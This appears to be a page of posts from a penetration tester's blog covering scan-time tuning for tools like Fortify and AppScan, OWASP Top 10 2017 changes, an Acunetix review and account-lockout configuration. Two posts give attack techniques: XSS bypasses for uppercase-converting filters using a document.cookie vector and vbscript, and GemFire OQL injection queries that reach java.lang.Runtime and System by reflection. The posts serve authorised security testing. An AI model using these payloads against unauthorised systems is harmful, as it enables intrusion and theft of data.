How do you refine time spent on application security scans?

A technocrat I respect asked me this question. “Year on year, you do scans using Fortify, Web Inspect, Appscan etc. But the scan time is always the same. Why can’t you refine it?”

I replied saying “Even brushing am doing for 30 decades. But I still take the same amount of time. I am dead scared to automate the process”. Though he took this in good sense and we laughed over it, I did tell him that scans can indeed be refined and effort cut down. But it is not like you did a scan for 2 hours this year and next year you want to increase productivity and hence wanted to scan within 30 minutes. That kind of blind refinement doesn’t exist.

So, what exactly can you do to cut down effort on the scan time? To know this, you should first know why a certain application with X number of pages takes Y amount of time for a scan. All tools that you use are nothing but automated script engines that would want to spider your application with certain rules/malicious vectors. So,

  1. The more the number of web pages in your scan, your scan time would increase.
  2. The more the number of input fields in your site, the more the time taken to execute the rules as the steps would have to be tried out per input field.
  3. The more the number of complexities in your site, the more time it would take. For example, if the application has a file upload feature, or a CAPTCHA or a dynamic generation script, it is going to take a certain amount of time for that.

So, these three parameters are not exactly in your hand and tweaking them will reduce the quality of your scan output. So, what and all can you reduce?

  1. Get the best infrastructure that is possible. Don’t expect a scan to run using 8 MB RAM. Go for the max that is allowed in your organization. If you are using dual core processor, ask for quad core or even better.
  2. All scan engines write to temporary files and log files in drives where the OS also is. Change this default setting so that the the system doesn’t slow down as the log file gets huge. If the OS is in C:/, you can change the log file settings to another drive.
  3. Policy -> Web Inspect uses ‘Standard Policy’ by default and App Scan uses Complete. But if you would go into these policies and inspect you will realize that they have a bunch of automated attack vectors that need to be executed. It may include finding a Struts vulnerability and also a PHP wordpress related vulnerability. So, if you are really sure about the application you are testing, experienced enough and can exercise sound judgement, this policy can be refined to cater to your application’s landscape. I have tried it out in applications and had scan time reduce by more than half.
  4. Threading -> The more the number of threads your tool is using per second, the sooner it will complete your scan. But it also comes at the cost of CPU usage. If it is looking like the tool is crashing, then reduce the number of threads.
  5. Scan Configuration Parameters :: There are other parameters that would let you test a page only once per attack, or once per every unique parameter, or repeat for every parameter. If customer wants scan time reduced and that seems to be the ultimate goal and quality can be compromised, you can try this out. But here, you will miss out on finding issues at every parameter.
  6. Rule Suppression, Sanitization and Others -> What if there is some code issue that is already fixed at deployment level but the tool is still finding it? One good example is the parseDouble() issue. In this case, you can write a suppression rule at rule pack level so that this isssue is suppressed and you don’t have to waste time analyzing it later.
  7. Last but not the least -> Schedule your scans so that it can run during non-work hours. If the application goes down during the scan time, you will have none to support you. But if you are running it at your own instance then this will work. In one project that I worked, we had to share the same instance with performance engineering team also and hence opted for a different timeslot.

Do you have any other measure that can reduce scan time?

 

 

 

Advertisements

Effort Estimation Model for DAST and SAST

Most often during my pre-sales work, I am asked to derive the estimation effort for DAST (Dynamic Application Security Testing) and SAST (Static Application Security Testing). These two testing methodologies are not new in a Software Development life cycle and are almost always done if a web application is internet facing. Read on if you are a customer (software owner) who requires DAST and SAST services for your application or a service provider who wishes to provide this service.

Continue reading “Effort Estimation Model for DAST and SAST”

What to do when your XSS attack vector is converted into CAPITAL letters by the application?

We keep encountering many types of unintended filters used by applications to present their input. One of them is to present all user input in CAPITAL letters. Even if there is no input validation done by the application, our normal XSS attack vector doesn’t work in this scenario.

Here is an example: Within scripts tags you would have given an inline alert(document.cookie);

In this case, the application converts it into ALERT(DOCUMENT.COOKIE). As Javascript is case sensitive, the alert fails to popup. Below are the options that you can do in this case.

Option 1: If VBscript is supported, then try out below. Since vbscript is case insensitive, it should not matter.

vbscript:msgbox(“hello”);

Option 2: Try loading external javascript. if your target application is behind a firewall, you can load your own JS file in an internal network and try loading it.

If the above two options don’t work, you can try out iframe or img src tags to inject your attack vector. There are some more ingenious tricks like shown in the below link but those are for rare cases. Hope this tip helped you.http://www.jsfuck.com/ 

OWASP Top 10 – 2017 – Release Candidate

The OWASP Top 10 – 2017 may be finalized in July or August this year but I had a chance to look at the release candidate version.

Some Changes:

  1. The category ‘Unvalidated Redirects and Forwards’ have been dropped.
  2. Categories ‘Indirect Direct Object References’ and ‘Missing Function Level Access Control’ have been clubbed together. So, if the issue is with either the data or the functionality, that difference wouldn’t matter any more.
  3. Two new categories have made into Top 10. ‘Insufficient Attack Protection’ that aims to detect and deter automated attacks against applications. ‘Underprotected API’ that targets issues in API like REST, JSON based services.

https://github.com/OWASP/Top10/blob/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pdf

 

 

 

Acunetix Version 11

Got an opportunity to look into the acunetix version 11. With this version, they have gone ahead with the web based version which is kind of good. When I look into it, these are the positive vibes I get.

  • I can exclude certain hours from the scan configuration. Say, I don’t want the scan to run at my night time, I can set so.
  • Likewise, if I need a manual intervention for a captcha, I can have options for that.

But that’s it. I am not able to find another feature that will make me go gaga over Acunetix.

  1. Their scanning profile actually looks scary as I don’t know what rules are part of complete scan and what rules are part of High Risk scan. I can’t seem to customize either.
  2. I seem to have had lot more control on the scan and application configuration with the desktop based product than on the web version. Though I realize that many utilities that came shipped with the desktop based version are now freebies, the web version looks like of empty.
  3. I really don’t seem to figure how to pause and resume a scan. Desktop version had it.
  4. Detailed Logging, Google hacking database and many fine tuning option, it looks like it all went missing.

A much disappointing build I should say. Probably, will wait for the next build.

GemFire OQL – Information Leakage

Gemfire is an in-memory data grid.It pools memory across multiple processes to manage application objects and behavior. Its written in Java and has a key-value structure storage. This data is stored in something called as a ‘region’ which can be queried using Object query language much like how one would have SQL for RDBMS.

I came to know about this some time back and since the opportunity of abusing an OQL is rare, I googled a bit about it. The only journal which references gemfire OQL and a remote command injection is below.

http://blog.emaze.net/2014/11/gemfire-from-oqli-to-rce-through.html

While doing penetration testing, I tried following the examples cited in this blog. The application I was testing was doing for black list filtering and hence all attack vectors weren’t going through properly but the first attack vector that was successful was something like below.

  1. select * from /region1 limit 10.

Comments: My query returned exactly 10 rows and I knew then that I would be able to pass any data in the parameter and  it is getting appended to code also.

2. select p.getclass.forName(‘java.lang.Runtime’).getDeclaredMethods()[7].getName() from /region1 p.

This query is similar to what is explained in the emaze blog and using the above construct, you would be able to list out all the methods of the run time. Getting to this stage was a little tough as I needed to tweak and find out which parameter was getting accepted and which wasn’t. For some reason, the invoke method wasn’t working at all. Before calling it a day, I had passed on this query to my colleague Prashanth working in a different timezone who cracked the shell.

3.select p.getclass.forName(‘java.lang.System’).getDeclaredMethods()[5].invoke(null, ‘os.version’.split(‘asd’)) from /region1 p

This gave out the version number and like wise, one can get all the System properties from similar queries. So, in your testing even if you don’t get a RCE, try an information leakage like above.

 

 

 

 

 

 

RSA Cleartrust Account Lockout Policy

By default, RSA Cleartrust provides options to lock accounts after five consecutive failed authentication attempts within one day. Likewise, the system can unlock users after a specified amount of time or provides an option to have the administrator of the system unlock the users.

The above configuration setting seems to be a foolproof one and one wouldn’t see anything wrong here. This was until I stumbled upon a specific configuration setting in one application. There, the development team had done the below configuration for account lock out.

“Lock accounts after 3 consecutive failed attempts within 2 minutes”. => This I didn’t even know was possible. At a glance it looks even more promising that this setting can catch a robot early. But wait, if I am a malicious insider or a person known to victim, I can use this feature to abuse the system every 3 minutes and finally capture the password. I don’t have to be a robot to get this out.

I told the AD team my thoughts and they removed this interval option from their setting. What are your thoughts?